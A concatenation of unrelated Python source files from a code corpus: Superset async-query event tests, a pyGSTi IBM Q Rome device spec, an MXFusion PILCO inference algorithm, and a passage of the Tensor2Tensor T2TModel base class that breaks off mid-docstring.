response = json.loads(rv.data.decode("utf-8"))
assert rv.status_code == 200
channel_id = app.config["GLOBAL_ASYNC_QUERIES_REDIS_STREAM_PREFIX"] + self.UUID
mock_xrange.assert_called_with(channel_id, "-", "+", 100)
self.assertEqual(response, {"result": []})
@mock.patch("uuid.uuid4", return_value=UUID)
def test_events_last_id(self, mock_uuid4):
async_query_manager.init_app(app)
self.login(username="admin")
with mock.patch.object(async_query_manager._redis, "xrange") as mock_xrange:
rv = self.fetch_events("1607471525180-0")
response = json.loads(rv.data.decode("utf-8"))
assert rv.status_code == 200
channel_id = app.config["GLOBAL_ASYNC_QUERIES_REDIS_STREAM_PREFIX"] + self.UUID
mock_xrange.assert_called_with(channel_id, "1607471525180-1", "+", 100)
self.assertEqual(response, {"result": []})
@mock.patch("uuid.uuid4", return_value=UUID)
def test_events_results(self, mock_uuid4):
async_query_manager.init_app(app)
self.login(username="admin")
with mock.patch.object(async_query_manager._redis, "xrange") as mock_xrange:
mock_xrange.return_value = [
(
"1607477697866-0",
{
"data": '{"channel_id": "1095c1c9-b6b1-444d-aa83-8e323b32831f", "job_id": "10a0bd9a-03c8-4737-9345-f4234ba86512", "user_id": "1", "status": "done", "errors": [], "result_url": "/api/v1/chart/data/qc-ecd766dd461f294e1bcdaa321e0e8463"}'
},
),
(
"1607477697993-0",
{
"data": '{"channel_id": "1095c1c9-b6b1-444d-aa83-8e323b32831f", "job_id": "027cbe49-26ce-4813-bb5a-0b95a626b84c", "user_id": "1", "status": "done", "errors": [], "result_url": "/api/v1/chart/data/qc-1bbc3a240e7039ba4791aefb3a7ee80d"}'
},
),
]
rv = self.fetch_events()
response = json.loads(rv.data.decode("utf-8"))
assert rv.status_code == 200
channel_id = app.config["GLOBAL_ASYNC_QUERIES_REDIS_STREAM_PREFIX"] + self.UUID
mock_xrange.assert_called_with(channel_id, "-", "+", 100)
expected = {
"result": [
{
"channel_id": "1095c1c9-b6b1-444d-aa83-8e323b32831f",
"errors": [],
"id": "1607477697866-0",
"job_id": "10a0bd9a-03c8-4737-9345-f4234ba86512",
"result_url": "/api/v1/chart/data/qc-ecd766dd461f294e1bcdaa321e0e8463",
"status": "done",
"user_id": "1",
},
{
"channel_id": "1095c1c9-b6b1-444d-aa83-8e323b32831f",
"errors": [],
"id": "1607477697993-0",
"job_id": "027cbe49-26ce-4813-bb5a-0b95a626b84c",
"result_url": "/api/v1/chart/data/qc-1bbc3a240e7039ba4791aefb3a7ee80d",
"status": "done",
"user_id": "1",
},
]
}
self.assertEqual(response, expected)
def test_events_no_login(self):
async_query_manager.init_app(app)
rv = self.fetch_events()
assert rv.status_code == 401
def test_events_no_token(self):
self.login(username="admin")
self.client.set_cookie(
"localhost", app.config["GLOBAL_ASYNC_QUERIES_JWT_COOKIE_NAME"], ""
)
rv = self.fetch_events()
assert rv.status_code == 401
|
the-stack_106_23783 | """ Specification of IBM Q Rome """
#***************************************************************************************************
# Copyright 2015, 2019 National Technology & Engineering Solutions of Sandia, LLC (NTESS).
# Under the terms of Contract DE-NA0003525 with NTESS, the U.S. Government retains certain rights
# in this software.
# Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except
# in compliance with the License. You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0 or in the LICENSE file in the root pyGSTi directory.
#***************************************************************************************************
qubits = ['Q' + str(x) for x in range(5)]
two_qubit_gate = 'Gcnot'
edgelist = [
('Q0', 'Q1'), ('Q1', 'Q0'),
('Q1', 'Q2'), ('Q2', 'Q1'),
('Q2', 'Q3'), ('Q3', 'Q2'),
('Q3', 'Q4'), ('Q4', 'Q3'),
]
spec_format = 'ibmq_v2019'
|
the-stack_106_23788 | # Copyright 2018 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License").
# You may not use this file except in compliance with the License.
# A copy of the License is located at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# or in the "license" file accompanying this file. This file is distributed
# on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
# express or implied. See the License for the specific language governing
# permissions and limitations under the License.
# ==============================================================================
import mxnet as mx
from .inference_alg import SamplingAlgorithm
from ..common.config import get_default_dtype, get_default_device
class PILCOAlgorithm(SamplingAlgorithm):
"""
Sampling-based inference algorithm that returns the expectation of each variable in the model.
:param model: the definition of the probabilistic model
:type model: Model
:param observed: A list of observed variables
:type observed: [Variable]
:param num_samples: the number of samples used in estimating the variational lower bound
:type num_samples: int
:param target_variables: (optional) the target variables to sample
:type target_variables: [UUID]
:param extra_graphs: a list of extra FactorGraph used in the inference
algorithm.
:type extra_graphs: [FactorGraph]
"""
def __init__(self, model, observed, cost_function, policy, n_time_steps, initial_state_generator, extra_graphs=None, num_samples=3, ctx=None, dtype=None):
"""
:param model: The model to use to generate the next state from a state/action pair.
:param observed: Observed variables for the model.
:param cost_function: The cost function to evaluate state/action pairs on.
:param policy: The policy function to determine what action to take next from a particular state.
:param n_time_steps: How many time steps to roll forward using the model+policy to generate a trajectory.
:param initial_state_generator: Function that generates initial states for the model to begin at.
:param num_samples: How many sample trajectories to compute at once
"""
super(PILCOAlgorithm, self).__init__(model, observed, extra_graphs=extra_graphs)
self.cost_function = cost_function
self.policy = policy
self.initial_state_generator = initial_state_generator
self.n_time_steps = n_time_steps
self.num_samples = num_samples
self.dtype = dtype if dtype is not None else get_default_dtype()
self.mxnet_context = ctx if ctx is not None else get_default_device()
def compute(self, F, variables):
"""
Compute the PILCO algorithm's policy computation loop.
1. Generates a number of initial state + action pairs
2. For each state+action pair:
1. Predict the new state (s_t_plus_1) given the current state and action pair
2. Compute the cost of being in that state
3. Use the policy to compute the next action (a_t_plus_1) to take from s_t_plus_1
4. Repeat n_time_steps into the future, using the previous round's state/action pairs to roll forward.
3. Return the total cost of all sample trajectories over time.
:param F: the execution context (mxnet.ndarray or mxnet.symbol)
:type F: Python module
:param variables: the set of MXNet arrays that holds the values of
variables at runtime.
:type variables: {str(UUID): MXNet NDArray or MXNet Symbol}
:returns: the outcome of the inference algorithm
:rtype: mxnet.NDArray or mxnet.Symbol
"""
s_0 = self.initial_state_generator(self.num_samples)
a_0 = self.policy(s_0)
a_t_plus_1 = a_0
x_t = F.expand_dims(F.concat(s_0, a_0, dim=1), axis=1)
cost = 0
for t in range(self.n_time_steps):
variables[self.model.X] = x_t
res = self.model.Y.factor.predict(F, variables, targets=[self.model.Y], num_samples=self.num_samples)[0]
s_t_plus_1 = res[0]
cost = cost + self.cost_function(s_t_plus_1, a_t_plus_1)
a_t_plus_1 = mx.nd.expand_dims(self.policy(s_t_plus_1), axis=2)
x_t = mx.nd.concat(s_t_plus_1, a_t_plus_1, dim=2)
total_cost = F.sum(cost)
return total_cost, total_cost
|
the-stack_106_23789 | # coding=utf-8
# Copyright 2018 The Tensor2Tensor Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""T2TModel Base Class."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import contextlib
import copy
import functools
import math
import time
import six
from tensor2tensor.data_generators import multi_problem
from tensor2tensor.data_generators import text_encoder
from tensor2tensor.data_generators.problem import problem_hparams_to_features
from tensor2tensor.layers import common_layers
from tensor2tensor.utils import beam_search
from tensor2tensor.utils import decoding
from tensor2tensor.utils import expert_utils as eu
from tensor2tensor.utils import learning_rate
from tensor2tensor.utils import metrics
from tensor2tensor.utils import modality
from tensor2tensor.utils import optimize
from tensor2tensor.utils import quantization
from tensor2tensor.utils import registry
import tensorflow as tf
from tensorflow.python.layers import base
from tensorflow.python.ops import inplace_ops
from tensorflow.python.ops import variable_scope
_no_problem_err_str = (
"The default implementation of %s requires that the "
"model be used with a Problem. If using a Problem, augment the "
"hparams object with trainer_lib.add_problem_hparams. If not, "
"override %s.")
_no_problem_err = (
lambda method_name: _no_problem_err_str % (method_name, method_name))
class T2TModel(base.Layer):
"""Abstract base class for models.
`T2TModel` has three typical usages:
1. Estimator: The method `make_estimator_model_fn` builds a `model_fn` for
the tf.Estimator workflow of training, evaluation, and prediction.
It performs the method `call`, which performs the core computation,
followed by `estimator_spec_train`, `estimator_spec_eval`, or
`estimator_spec_predict` depending on the tf.Estimator mode.
2. Layer: The method `call` enables `T2TModel` to be used a callable by
itself. It calls the following methods:
* `bottom`, which transforms features according to `problem_hparams`' input
and target `Modality`s;
* `body`, which takes features and performs the core model computation to
return output and any auxiliary loss terms;
* `top`, which takes features and the body output, and transforms them
according to `problem_hparams`' input and target `Modality`s to return
the final logits;
* `loss`, which takes the logits, forms any missing training loss, and sums
all loss terms.
3. Inference: The method `infer` enables `T2TModel` to make sequence
predictions by itself.
Subclasses generally only need to override `body`.
"""
REGISTERED_NAME = None # Updated on registration.
def __init__(self,
hparams,
mode=tf.estimator.ModeKeys.TRAIN,
problem_hparams=None,
data_parallelism=None,
decode_hparams=None,
**kwargs):
"""Creates a T2TModel.
Args:
hparams: tf.contrib.training.HParams, model hyperparameters.
mode: tf.estimator.ModeKeys, the execution mode.
problem_hparams: tf.contrib.training.HParams, hyperparameters for the
Problem. If provided here or in hparams.problem_hparams, the model will
automatically determine bottom, top, and loss methods. If not provided,
calling the model will only invoke body.
data_parallelism: a expert_utils.Parallelism object,
specifies devices for data parallelism.
decode_hparams: a hyperparameter object with decoding parameters.
See decoding.decode_hparams.
**kwargs: arguments to pass to base.Layer constructor.
"""
# Determine name first: use registered name if possible, class name else.
default_name = registry.default_name(type(self))
name = self.REGISTERED_NAME or default_name
super(T2TModel, self).__init__(
trainable=mode == tf.estimator.ModeKeys.TRAIN, name=name, **kwargs)
if not problem_hparams and hasattr(hparams, "problem_hparams"):
problem_hparams = hparams.problem_hparams
self._problem_hparams = problem_hparams
# Setup hparams
hparams = copy.copy(hparams)
if self._problem_hparams and hparams.shared_embedding_and_softmax_weights:
# If vocabularies differ, unset shared_embedding_and_softmax_weights.
input_modality = self._problem_hparams.modality.get("inputs")
target_modality = self._problem_hparams.modality.get("targets")
if (isinstance(input_modality, modality.Modality) and
isinstance(target_modality, modality.Modality) and
input_modality.top_dimensionality !=
target_modality.top_dimensionality):
log_info("Unsetting shared_embedding_and_softmax_weights.")
hparams.shared_embedding_and_softmax_weights = 0
self._original_hparams = hparams
self.set_mode(mode)
self._decode_hparams = copy.copy(decode_hparams or
decoding.decode_hparams())
self._data_parallelism = data_parallelism or eu.Parallelism([""])
self._num_datashards = self._data_parallelism.n
self._ps_devices = self._data_parallelism.ps_devices
self._eager_var_store = create_eager_var_store()
if not common_layers.is_xla_compiled():
self.summarize_hparams()
self._variable_scopes = {}
def _add_variable_scope(self, key, vs):
if key not in self._variable_scopes:
self._variable_scopes[key] = vs
def summarize_hparams(self):
def create_hparams_summary(hparams, name):
hparams_strs = [tf.convert_to_tensor([k, str(v)])
for k, v in hparams.values().items()]
tf.summary.text(name, tf.stack(hparams_strs))
create_hparams_summary(self._hparams, "%s_hparams" % self.name)
if self._problem_hparams:
create_hparams_summary(self._problem_hparams,
"%s_problem_hparams" % self.name)
# Replace the two methods below in order to add custom SessionRunHooks to
# the training procedure.
@staticmethod
def train_hooks(hook_context):
return []
@staticmethod
def eval_hooks(hook_context):
return []
@property
def hparams(self):
return self._hparams
@property
def is_training(self):
return self._hparams.mode == tf.estimator.ModeKeys.TRAIN
@property
def is_predicting(self):
return self._hparams.mode == tf.estimator.ModeKeys.PREDICT
@property
def has_input(self):
if self._problem_hparams:
return "inputs" in self._problem_hparams.modality
else:
return True
@property
def _custom_getter(self):
if self.hparams.weight_dtype == "bfloat16":
if self.hparams.optimizer != "Adafactor":
raise NotImplementedError(
"weight_dtype=bfloat16 only implemented with Adafactor optimizer")
return quantization.EighthPowerEncoding().custom_getter(
activation_dtype=tf.bfloat16
if self.hparams.activation_dtype == "bfloat16" else tf.float32)
elif self.hparams.activation_dtype == "bfloat16":
return quantization.bfloat16_activations_var_getter
else:
return None
@property
def _target_modality_is_real(self):
"""Whether the target modality is real-valued."""
target_modality = self._problem_hparams.modality["targets"]
return target_modality.name.startswith("real_")
def call(self, inputs, **kwargs):
del kwargs
features = inputs
set_custom_getter_compose(self._custom_getter)
tf.get_variable_scope().set_initializer(
optimize.get_variable_initializer(self.hparams))
with self._eager_var_store.as_default():
self._fill_problem_hparams_features(features)
summarize_features(features, num_shards=self._num_datashards)
sharded_features = self._shard_features(features)
sharded_logits, losses = self.model_fn_sharded(sharded_features)
if isinstance(sharded_logits, dict):
concat_logits = {}
for k, v in six.iteritems(sharded_logits):
concat_logits[k] = tf.concat(v, 0)
return concat_logits, losses
else:
return tf.concat(sharded_logits, 0), losses
@staticmethod
def has_symmetric_shards(model_name):
# model_fn is sharded symmetrically unless the model overrides body_sharded
# method to manually control the sharding.
model_cls = registry.model(model_name)
return not model_cls.use_body_sharded()
@staticmethod
def use_body_sharded():
return False
def body_sharded(self, sharded_features):
raise NotImplementedError("Models that wish to manually control sharding, "
"e.g. MoE models, should override body_sharded "
"and set use_body_sharded to True.")
def model_fn_sharded(self, sharded_features):
dp = self._data_parallelism
datashard_to_features = self._to_features_per_datashard(sharded_features)
if self.use_body_sharded():
# MoE models override body_sharded
transformed_features = dp(self.bottom, datashard_to_features)
body_out = self.body_sharded(
self._to_single_features_dict(transformed_features))
body_out, losses = self._normalize_body_output(body_out)
if "training" in losses:
log_info("Skipping T2TModel top and loss because training loss "
"returned from body")
sharded_logits = body_out
else:
if isinstance(body_out, dict):
sharded_logits = collections.OrderedDict()
sharded_losses = collections.OrderedDict()
for k, v in sorted(six.iteritems(body_out)):
sharded_logits[k] = dp(self.top, v, datashard_to_features)
sharded_losses[k] = dp(self.loss, sharded_logits[k],
datashard_to_features)
training_loss_dict = average_sharded_losses([{
"training": l
} for l in loss for loss in sharded_losses.values()])
losses.update(training_loss_dict)
else:
sharded_logits = dp(self.top, body_out, datashard_to_features)
sharded_losses = dp(self.loss, sharded_logits, datashard_to_features)
if isinstance(sharded_losses, tuple):
nums, dens = sharded_losses
sharded_losses = zip(nums, dens)
training_loss_dict = average_sharded_losses([{
"training": loss
} for loss in sharded_losses])
losses.update(training_loss_dict)
else:
sharded_logits, sharded_losses = dp(self.model_fn, datashard_to_features)
if isinstance(sharded_logits[0], dict):
temp_dict = {k: [] for k, _ in six.iteritems(sharded_logits[0])}
for k, _ in six.iteritems(sharded_logits[0]):
for l in sharded_logits:
temp_dict[k].append(l[k])
sharded_logits = temp_dict
losses = average_sharded_losses(sharded_losses)
# TODO(rsepassi): Reenable scheduled sampling
# Disabled because of model_fn_sharded refactor
#
# do_scheduled_sampling = ( # Only do it if training and set for it.
# self.hparams.scheduled_sampling_prob > 0.0 and
# self.hparams.mode == tf.estimator.ModeKeys.TRAIN)
# if do_scheduled_sampling:
# sharded_logits, losses = scheduled_sampling(
# self.hparams, self._problem_hparams, dp,
# sharded_logits, losses, sharded_features,
# transformed_features, self)
return sharded_logits, losses
def model_fn(self, features):
with tf.variable_scope(tf.get_variable_scope(), use_resource=True) as vs:
self._add_variable_scope("model_fn", vs)
transformed_features = self.bottom(features)
if self.hparams.activation_dtype == "bfloat16":
for k, v in sorted(six.iteritems(transformed_features)):
if v.dtype == tf.float32:
transformed_features[k] = tf.cast(v, tf.bfloat16)
with tf.variable_scope("body") as body_vs:
self._add_variable_scope("body", body_vs)
log_info("Building model body")
body_out = self.body(transformed_features)
output, losses = self._normalize_body_output(body_out)
if "training" in losses:
log_info("Skipping T2TModel top and loss because training loss "
"returned from body")
logits = output
else:
logits = self.top(output, features)
losses["training"] = 0.0
if (self._hparams.mode != tf.estimator.ModeKeys.PREDICT and
self._hparams.mode != "attack"):
losses["training"] = self.loss(logits, features)
return logits, losses
def bottom(self, features):
"""Transforms features to feed into body.
Args:
features: dict of str to Tensor. Typically it is the preprocessed data
batch after Problem's preprocess_example().
Returns:
transformed_features: dict of same key-value pairs as features. The value
Tensors are newly transformed.
"""
if not self._problem_hparams:
log_warn("Without a Problem, T2TModel.bottom is a passthrough.")
return features
transformed_features = collections.OrderedDict()
all_previous_modalities = []
target_modality = _create_target_modality(self._problem_hparams.modality)
# Transform features via its corresponding modality.
for feature_name, modality_obj in sorted(
six.iteritems(self._problem_hparams.modality)):
if feature_name not in features:
tf.logging.warning("Missing feature %s - ignoring." % feature_name)
continue
# Use if-else clauses to preserve behavior of previous changes: namely,
# the variable scope name for the targets feature if there is only one
# target modality; and to reuse variable scopes for only input modalities.
if feature_name in target_modality:
if len(target_modality) > 1:
variable_scope_name = "%s/%s" % (modality_obj.name, feature_name)
else:
variable_scope_name = modality_obj.name
# TODO(aidangomez): share variables?
with tf.variable_scope(variable_scope_name) as vs:
self._add_variable_scope(variable_scope_name, vs)
log_info("Transforming feature '%s' with %s.targets_bottom",
feature_name,
modality_obj.name)
transformed_features[feature_name] = modality_obj.targets_bottom(
features[feature_name])
else:
do_reuse = modality_obj.name in all_previous_modalities
with tf.variable_scope(modality_obj.name, reuse=do_reuse) as vs:
self._add_variable_scope(modality_obj.name, vs)
log_info("Transforming feature '%s' with %s.bottom",
feature_name,
modality_obj.name)
transformed_features[feature_name] = modality_obj.bottom(
features[feature_name])
all_previous_modalities.append(modality_obj.name)
for key in features:
if key not in transformed_features:
# For features without a modality, we pass them along as is
transformed_features[key] = features[key]
else:
# Other features get passed along with the "raw" suffix
transformed_features[key + "_raw"] = features[key]
return transformed_features
def body(self, features):
"""Computes the targets' pre-logit activations given transformed inputs.
Most `T2TModel` subclasses will override this method.
Args:
features: dict of str to Tensor, where each Tensor has shape [batch_size,
..., hidden_size]. It typically contains keys `inputs` and `targets`.
Returns:
output: Tensor of pre-logit activations with shape [batch_size, ...,
hidden_size].
losses: Either single loss as a scalar, a list, a Tensor (to be averaged),
or a dictionary of losses. If losses is a dictionary with the key
"training", losses["training"] is considered the final training
loss and output is considered logits; self.top and self.loss will
be skipped.
"""
raise NotImplementedError("Abstract Method")
def _top_single(self, body_output, target_modality, features):
if not target_modality:
log_warn("Without a Problem, T2TModel.top is a passthrough.")
return body_output
with tf.variable_scope(target_modality.name) as tm_vs:
self._add_variable_scope(tm_vs.name, tm_vs)
log_info("Transforming body output with %s.top", target_modality.name)
last_only = (
target_modality.top_is_pointwise and
self.hparams.mode == tf.estimator.ModeKeys.PREDICT and
not self.hparams.force_full_predict)
if not last_only:
logits = target_modality.top(body_output, features.get("targets"))
else:
# Take body outputs for the last position only, and targets too.
if "decode_loop_step" not in features:
last_position_body_output = tf.expand_dims(
body_output[:, -1, :, :], axis=[1])
last_position_targets = tf.expand_dims(
features["targets"][:, -1, :, :], axis=[1])
else:
body_output_shape = body_output.shape.as_list()
last_position_body_output = tf.slice(
body_output, [0, features["decode_loop_step"][0], 0, 0], [
body_output_shape[0], 1, body_output_shape[2],
body_output_shape[3]
])
target_shape = features["targets"].shape.as_list()
last_position_targets = tf.slice(
features["targets"], [0, features["decode_loop_step"][0], 0, 0],
[target_shape[0], 1, target_shape[2], target_shape[3]])
logits = target_modality.top(last_position_body_output,
last_position_targets)
return logits
def top(self, body_output, features):
"""Computes logits given body output and features.
Args:
body_output: dict of str to Tensor, comprising one key-value pair for each
target. Each value denotes the target's pre-logit activations.
Alternatively, it may be a single Tensor denoting the pre-logits for
that target.
features: dict of str to Tensor. Typically it is the preprocessed data
batch after Problem's preprocess_example().
Returns:
logits: dict of str to Tensor, denoting each logits for each target; or
a single Tensor denoting the logits for that target.
"""
if isinstance(body_output, dict):
if self._problem_hparams:
target_modality = _create_target_modality(
self._problem_hparams.modality)
else:
target_modality = {k: None for k in body_output.keys()}
for k in body_output.keys():
assert k in target_modality.keys(), (
"The key %s of model_body's returned logits dict must be in "
"problem_hparams.modality's dict." % k)
logits = {}
for k, v in six.iteritems(body_output):
# TODO(aidangomez): share variables here?
with tf.variable_scope(k) as top_vs:
self._add_variable_scope("top_%s" % k, top_vs)
logits[k] = self._top_single(v, target_modality[k], features)
return logits
else:
if self._problem_hparams:
target_modality = _create_target_modality(
self._problem_hparams.modality)
else:
target_modality = None
if isinstance(target_modality, dict):
assert "targets" in target_modality, (
"model_body returned single logits so 'targets' must be a key "
"since problem_hparams.modality is a dict.")
target_modality = target_modality["targets"]
return self._top_single(body_output, target_modality, features)
def _loss_single(self, logits, target_modality, feature):
# The current bfloat16 version still uses float32 for most parts of backward
# propagation to keep model quality, so cast back before computing the loss
# value.
if not target_modality:
log_warn(_no_problem_err("loss"))
return (tf.constant(0., dtype=tf.float32),
tf.constant(1., dtype=tf.float32))
loss_num, loss_den = target_modality.loss(logits, feature)
loss_num *= self._problem_hparams.loss_multiplier
if hasattr(self.hparams, "problem") and hasattr(
self.hparams.problem, "task_list"):
loss_num, loss_den, summaries = multi_problem.aggregate_task_losses(
self.hparams,
self._problem_hparams,
logits,
target_modality,
feature
)
for key, val in summaries:
tf.summary.scalar(key, val)
return loss_num, loss_den
def loss(self, logits, features):
if isinstance(logits, dict):
if self._problem_hparams:
target_modality = _create_target_modality(
self._problem_hparams.modality)
else:
target_modality = {k: None for k in logits.keys()}
for k in logits.keys():
assert k in target_modality.keys(), (
"The key %s of model_body's returned logits dict must be in "
"problem_hparams.modality's dict." % k)
losses = {}
for k, v in six.iteritems(logits):
losses[k] = self._loss_single(v, target_modality[k], features[k])
n, d = losses[k]
if common_layers.should_generate_summaries():
tf.summary.scalar(k + "_loss", n / d)
tf.summary.scalar(k + "_loss_num", n)
tf.summary.scalar(k + "_loss_den", d)
if getattr(self.hparams, "visualize_logits_histogram", False):
hist = tf.summary.histogram
hist(k + "_predict", tf.argmax(tf.squeeze(v), axis=-1))
hist(k + "_targets", features[k])
return tf.add_n([n / d for n, d in losses.values()])
else:
if self._problem_hparams:
target_modality = _create_target_modality(
self._problem_hparams.modality)
else:
target_modality = None
if isinstance(target_modality, dict):
assert "targets" in target_modality, (
"model_body returned single logits so 'targets' must be a key "
"since problem_hparams.modality is a dict.")
target_modality = target_modality["targets"]
return self._loss_single(logits, target_modality, features["targets"])
def optimize(self, loss, num_async_replicas=1, use_tpu=False):
"""Return a training op minimizing loss."""
lr = learning_rate.learning_rate_schedule(self.hparams)
if num_async_replicas > 1:
log_info("Dividing learning rate by num_async_replicas: %d",
num_async_replicas)
lr /= math.sqrt(float(num_async_replicas))
train_op = optimize.optimize(loss, lr, self.hparams, use_tpu=use_tpu)
return train_op
def set_mode(self, mode):
"""Set hparams with the given mode."""
log_info("Setting T2TModel mode to '%s'", mode)
hparams = copy.copy(self._original_hparams)
hparams.add_hparam("mode", mode)
# When not in training mode, set all forms of dropout to zero.
if mode != tf.estimator.ModeKeys.TRAIN:
for key in hparams.values():
if key.endswith("dropout") or key == "label_smoothing":
log_info("Setting hparams.%s to 0.0", key)
setattr(hparams, key, 0.0)
self._hparams = hparams
if self._problem_hparams:
# Set model hparams in problem_hparams' modalities, which also store them.
for modality_obj in six.itervalues(self._problem_hparams.modality):
if modality_obj is not None:
modality_obj._model_hparams = self._hparams # pylint: disable=protected-access
def prepare_features_for_infer(self, features):
"""Called before inference to allow adding infer-specific features."""
pass
def eval_autoregressive(self, features=None, decode_length=50):
"""Autoregressive eval.
Quadratic time in decode_length.
Args:
features: an map of string to `Tensor`
decode_length: an integer. How many additional timesteps to decode.
Returns:
logits: `Tensor`
losses: a dictionary: {loss-name (string): floating point `Scalar`}.
Contains a single key "training".
"""
results = self._slow_greedy_infer(features, decode_length=decode_length)
return results["logits"], results["losses"]
def _fill_problem_hparams_features(self, features):
if features is not None:
for k, v in sorted(
six.iteritems(problem_hparams_to_features(self._problem_hparams))):
if k not in features:
features[k] = tf.constant(v, name=k)
def infer(self,
features=None,
decode_length=50,
beam_size=1,
top_beams=1,
alpha=0.0,
use_tpu=False):
"""A inference method.
Quadratic time in decode_length.
Args:
features: an map of string to `Tensor`
decode_length: an integer. How many additional timesteps to decode.
beam_size: number of beams.
top_beams: an integer. How many of the beams to return.
alpha: Float that controls the length penalty. larger the alpha, stronger
the preference for longer translations.
use_tpu: bool, whether to build the inference graph for TPU.
Returns:
A dict of decoding results {
"outputs": integer `Tensor` of decoded ids of shape
[batch_size, <= decode_length] if beam_size == 1 or
[batch_size, top_beams, <= decode_length]
"scores": decoding log probs from the beam search,
None if using greedy decoding (beam_size=1)
}
if slow greedy decoding is used then the dict will also contain {
"logits": `Tensor` of shape [batch_size, time, 1, 1, vocab_size].
"losses": a dictionary: {loss-name (string): floating point `Scalar`
}
"""
set_custom_getter_compose(self._custom_getter)
with self._eager_var_store.as_default():
# TODO(rsepassi): Make decoding work with real-valued model outputs
# (i.e. if the target modality is RealModality).
self.prepare_features_for_infer(features)
if not self.has_input and beam_size > 1:
log_warn("Beam searching for a model with no inputs.")
if not self.has_input and self.hparams.sampling_method != "random":
log_warn("Non-random sampling for a model with no inputs.")
self._fill_problem_hparams_features(features)
if self._problem_hparams:
target_modality = self._problem_hparams.modality["targets"]
if target_modality.is_class_modality:
beam_size = 1 # No use to run beam-search for a single class.
if beam_size == 1:
log_info("Greedy Decoding")
results = self._greedy_infer(features, decode_length, use_tpu)
else:
log_info("Beam Decoding with beam size %d" % beam_size)
results = self._beam_decode(features, decode_length, beam_size,
top_beams, alpha, use_tpu)
return results
def _beam_decode(self,
features,
decode_length,
beam_size,
top_beams,
alpha,
use_tpu=False):
"""Beam search decoding.
Models should ideally implement a more efficient version of this function.
Args:
features: an map of string to `Tensor`
decode_length: an integer. How many additional timesteps to decode.
beam_size: number of beams.
top_beams: an integer. How many of the beams to return.
alpha: Float that controls the length penalty. larger the alpha, stronger
the preference for longer translations.
use_tpu: A bool, whether to do beam decode on TPU.
Returns:
samples: an integer `Tensor`. Top samples from the beam search
"""
return self._beam_decode_slow(features, decode_length, beam_size, top_beams,
alpha, use_tpu)
def _beam_decode_slow(self, features, decode_length, beam_size, top_beams,
alpha, use_tpu=False):
"""Slow version of Beam search decoding.
Quadratic time in decode_length.
Args:
features: an map of string to `Tensor`
decode_length: an integer. How many additional timesteps to decode.
beam_size: number of beams.
top_beams: an integer. How many of the beams to return.
alpha: Float that controls the length penalty. larger the alpha, stronger
the preference for longer translations.
use_tpu: A bool, whether to do slow beam decode on TPU.
Returns:
samples: an integer `Tensor`. Top samples from the beam search.
Raises:
NotImplementedError: If use_tpu is set to true.
"""
if use_tpu:
raise NotImplementedError(
"Slow beam search inference on TPU is not supported")
batch_size = common_layers.shape_list(features["inputs"])[0]
def symbols_to_logits_fn(ids):
"""Go from ids to logits."""
ids = tf.expand_dims(tf.expand_dims(ids, axis=2), axis=3)
ids = tf.pad(ids[:, 1:], [[0, 0], [0, 1], [0, 0], [0, 0]])
if "partial_targets" in features:
pt = features["partial_targets"]
pt_length = common_layers.shape_list(pt)[1]
pt = tf.tile(pt, [1, beam_size])
pt = tf.reshape(pt, [batch_size * beam_size, pt_length, 1, 1])
ids = tf.concat([pt, ids], axis=1)
features["targets"] = ids
self._coverage = None
logits, _ = self(features) # pylint: disable=not-callable
# now self._coverage is a coverage tensor for the first datashard.
# it has shape [batch_size] and contains floats between 0 and
# source_length.
if self._problem_hparams:
if self._problem_hparams.modality["targets"].top_is_pointwise:
return tf.squeeze(logits, axis=[1, 2, 3])
# -1 due to the pad above.
current_output_position = common_layers.shape_list(ids)[1] - 1
logits = logits[:, current_output_position, :, :]
return tf.squeeze(logits, axis=[1, 2])
initial_ids = tf.zeros([batch_size], dtype=tf.int32)
if self.has_input:
inputs_old = features["inputs"]
features["inputs"] = tf.expand_dims(features["inputs"], 1)
if len(features["inputs"].shape) < 5:
features["inputs"] = tf.expand_dims(features["inputs"], 4)
# Expand the inputs in to the beam size.
features["inputs"] = tf.tile(features["inputs"], [1, beam_size, 1, 1, 1])
s = common_layers.shape_list(features["inputs"])
features["inputs"] = tf.reshape(features["inputs"],
[s[0] * s[1], s[2], s[3], s[4]])
target_modality = self._problem_hparams.modality["targets"]
vocab_size = target_modality.top_dimensionality
# Setting decode length to input length + decode_length
decode_length = tf.constant(decode_length)
if "partial_targets" not in features:
inputs = features["inputs"]
decode_length = (common_layers.shape_list(inputs)[1] +
features.get("decode_length", decode_length))
ids, scores = beam_search.beam_search(
symbols_to_logits_fn,
initial_ids,
beam_size,
decode_length,
vocab_size,
alpha,
stop_early=(top_beams == 1))
# Set inputs back to the unexpanded inputs to not to confuse the Estimator!
if self.has_input:
features["inputs"] = inputs_old
# Return `top_beams` decodings (also remove initial id from the beam search)
# TODO(lukaszkaiser): make it work multi-problem.
if top_beams == 1:
samples = ids[:, 0, 1:]
else:
samples = ids[:, :top_beams, 1:]
return {"outputs": samples, "scores": scores}
def _greedy_infer(self, features, decode_length, use_tpu=False):
"""A greedy inference method.
Models should ideally implement a more efficient version of this function.
Args:
features: an map of string to `Tensor`
decode_length: an integer. How many additional timesteps to decode.
use_tpu: A bool, whether to build the inference graph for TPU.
Returns:
A dict of decoding results {
"outputs": integer `Tensor` of decoded ids of shape
[batch_size, <= decode_length] if beam_size == 1 or
[batch_size, top_beams, <= decode_length]
"scores": None
"logits": `Tensor` of shape [batch_size, time, 1, 1, vocab_size].
"losses": a dictionary: {loss-name (string): floating point `Scalar`}
}
"""
return (self._slow_greedy_infer_tpu(features, decode_length)
if use_tpu else self._slow_greedy_infer(features, decode_length))
def _slow_greedy_infer_tpu(self, features, decode_length):
"""A slow greedy inference method on TPU.
Quadratic time in decode_length.
Args:
features: An map of string to `Tensor`.
decode_length: An integer, how many additional timesteps to decode.
Returns:
A dict of decoding results {
